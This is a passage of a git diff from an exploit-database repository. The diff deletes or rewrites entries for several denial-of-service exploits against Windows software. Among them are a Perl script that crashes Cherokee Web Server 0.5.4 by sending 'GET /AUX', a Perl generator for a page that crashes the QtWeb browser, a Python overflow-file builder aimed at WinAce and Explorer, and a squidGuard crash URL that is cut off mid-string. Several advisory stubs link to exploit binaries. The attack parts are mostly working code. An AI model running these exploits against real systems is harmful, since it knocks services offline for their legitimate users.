-"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur -Explorer crashes . -# Successfully tested on Windows XP SP2 FR, -import sys -txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41"))); # -txt_title = "\x41"*194 # -ext = ".txt"; -headers = open(txt_title + ext, "w") -headers.write(txt_header) -headers.close() -print "\nFile created successfully !"; -print "\n\cN4phux."; diff --git a/platforms/windows/remote/33707.txt b/platforms/windows/remote/33707.txt deleted file mode 100755 index fc3314c11..000000000 --- a/platforms/windows/remote/33707.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/38549/info - -Orb Networks Orb is prone to a denial-of-service vulnerability when handling malformed '.mp3' files. - -Successfully exploiting this issue allows remote attackers to deny service to legitimate users. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33707.zip \ No newline at end of file diff --git a/platforms/windows/remote/35873.txt b/platforms/windows/remote/35873.txt deleted file mode 100755 index 0ea18881c..000000000 --- a/platforms/windows/remote/35873.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/48389/info - -Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. - -An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. - -Wireshark 1.4.5 is vulnerable. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35873.pcap \ No newline at end of file diff --git a/platforms/windows/remote/36128.txt b/platforms/windows/remote/36128.txt deleted file mode 100755 index ca258328b..000000000 --- a/platforms/windows/remote/36128.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/49521/info - -Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files. - -Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. - -Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36128.pcap \ No newline at end of file diff --git a/platforms/windows/remote/37673.html b/platforms/windows/remote/37673.html deleted file mode 100755 index e76ade42d..000000000 --- a/platforms/windows/remote/37673.html +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/55202/info - -Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error. - -An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control. - -The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. - - Exploit \ No newline at end of file diff --git a/platforms/windows/remote/6600.html b/platforms/windows/remote/6600.html index 2f8997000..62a299242 100755 --- a/platforms/windows/remote/6600.html +++ b/platforms/windows/remote/6600.html @@ -1,41 +1,41 @@ -##################Chilkat IMAP ActiveX File Execution&IE DoS ################ - -www.chilkasoft.com - -####By: e.wiZz! -####Info: Bosnian Idiot FTW! -####Site: infected.blogger.ba -####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum - -In the wild... - -##################################################################################### - -File: ChilkatMail_v7_9.dll -ProgID: ChilkatMail2.ChilkatMailMan2.1 -CLSID: 126FB030-1E9E-4517-A254-430616582C50 - -Description: - -Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE. - -Tested on IE 6,Win xp sp2 - -##################################################################################### - - - - -# milw0rm.com [2008-09-27] +##################Chilkat IMAP ActiveX File Execution&IE DoS ################ + +www.chilkasoft.com + +####By: e.wiZz! +####Info: Bosnian Idiot FTW! +####Site: infected.blogger.ba +####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum + +In the wild... + +##################################################################################### + +File: ChilkatMail_v7_9.dll +ProgID: ChilkatMail2.ChilkatMailMan2.1 +CLSID: 126FB030-1E9E-4517-A254-430616582C50 + +Description: + +Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE. + +Tested on IE 6,Win xp sp2 + +##################################################################################### + + + + +# milw0rm.com [2008-09-27] diff --git a/platforms/windows/webapps/12852.txt b/platforms/windows/webapps/12852.txt deleted file mode 100755 index d8989960b..000000000 --- a/platforms/windows/webapps/12852.txt +++ /dev/null @@ -1,56 +0,0 @@ -# Title:QtWeb 3.3 Remote DoS/Crash Exploit -# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe -# Portable: http://www.qtweb.net/downloads/QtWeb.exe -# Version: 3.3 -# Platform:Windows - - -_____ _____ _ _ -| __ \ / ____| (_) | -| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ -| ___/ \___ \ / _ \/ __| | | | '__| | __| | | | -| | ____) | __/ (__| |_| | | | | |_| |_| | -|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | - __/ | - |___/ -Exploit ----------------- -#!/usr/bin/perl -# File Name :QtWeb 3.3 Remote DoS/Crash Exploit -# Vuln :Remote Dos/Crash -# Author :PoisonCode -# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit -# Date:02/06/2010 -# Author:PoisonCode -# Site :http://www.qtweb.net/ -# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe -# Portable:http://www.qtweb.net/downloads/QtWeb.exe -# Version: 3.3 -# Tested on: Windows -$file="Exploit QtWeb 3.3.html"; -print " ======================================\n"; -print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n"; -print " = Autor:PoisonCode =\n"; -print " = Web :PanamaSecurity.blogspot.com =\n"; -print " ======================================\n"; -print "\n"; -print " Espere Mientras se Genera el Exploit\n"; -my $a="\x55" x 100000000; -my $b="\85" x 55900000; -my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; -open(myfile,">>$file"); -print myfile ""; -print myfile "PanamaSecurity - PoisonCode $c "; -print myfile ''; -print myfile "$a,$b,$c"; -print myfile '">'; -print myfile ""; -close(myfile); -print "\n"; -print " Nombre del Archivo : $file\n"; -print " Se Ha Creado El Exploit Correctamente \n"; -print "\n"; -print "----------------------------------------------------------------------\n"; -print " Visiten : PanamaSecurity.blogspot.com\n"; \ No newline at end of file diff --git a/platforms/windows/webapps/9874.txt b/platforms/windows/webapps/9874.txt deleted file mode 100755 index fb8facac7..000000000 --- a/platforms/windows/webapps/9874.txt +++ /dev/null @@ -1,111 +0,0 @@ -########################################################################################### -# -# Name : Cherokee Web Server 0.5.4 Denial Of Service -# Author: Usman Saeed -# Company: Xc0re Security Research Group -# Website: http://www.xc0re.net -# DATE: 25/10/09 -# Tested on Windows ! -########################################################################################### - -Disclaimer: [This code is for Educational Purposes , I would Not be -responsible for any misuse of this code] - -[*] Download Page : http://www.cherokee-project.com/download/windows/ - - -[*] Attack type : Remote - - -[*] Patch Status : Unpatched - - - -[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to -the server , the server crashes ! - - - -[*] Exploitation : - - -#!/usr/bin/perl -# Cherokee Web Server 0.5.4 Denial Of Service -# Disclaimer: -# [This code is for Educational Purposes , I would Not be responsible for -any misuse of this code] -# Author: Usman Saeed -# Company: Xc0re Security Research Group -# Website: http://www.xc0re.net -# DATE: [25/10/09] - -$host = $ARGV[0]; -$PORT = $ARGV[1]; - -$packet = "AUX"; - - -$stuff = "GET /".$packet." HTTP/1.1\r\n" . -"User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" . -"Host:127.0.0.1\r\n". -"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, -image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n". -"Accept-Language: en-US,en;q=0.9\r\n". -"Accept-Charset: iso-8859-1,*,utf-8\r\n". -"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n"; - - - - -use IO::Socket::INET; -if (! defined $ARGV[0]) -{ -print "+========================================================+\n"; -print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; -print "+ Author [Usman Saeed] +\n"; -print "+ Company [Xc0re Security Research Group] +\n"; -print "+ DATE: [25/10/09] +\n"; -print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; -print "+ Disclaimer: [This code is for Educational Purposes , +\n"; -print "+ I would Not be responsible for any misuse of this code]+\n"; -print "+========================================================+\n"; - - - - - -exit; -} - - -$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , -PeerPort => $PORT) || die "Cant connect to $host!"; -print "+========================================================+\n"; -print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; -print "+ Author [Usman Saeed] +\n"; -print "+ Company [Xc0re Security Research Group] +\n"; -print "+ DATE: [25/10/09] +\n"; -print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; -print "+ Disclaimer: [This code is for Educational Purposes , +\n"; -print "+ I would Not be responsible for any misuse of this code]+\n"; -print "+========================================================+\n"; - - - - -print "\n"; - -print "[*] Initializing\n"; - -sleep(2); - -print "[*] Sendin DOS Packet \n"; - -send ($sock , $stuff , 0); -print "[*] Crashed :) \n"; -$res = recv($sock,$response,1024,0); -print $response; - - - -exit; \ No newline at end of file diff --git a/platforms/xml/webapps/37685.txt b/platforms/xml/webapps/37685.txt deleted file mode 100755 index e773389bd..000000000 --- a/platforms/xml/webapps/37685.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/55291/info - -squidGuard is prone to a remote denial-of-service vulnerability. - -A successful exploit will cause the application to enter emergency mode in which URLs are not blocked. This will result in a denial-of-service condition. - -squidGuard 1.4 is vulnerable; other versions may also be affected. - -http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa - rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm - =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par - m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par - m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697 -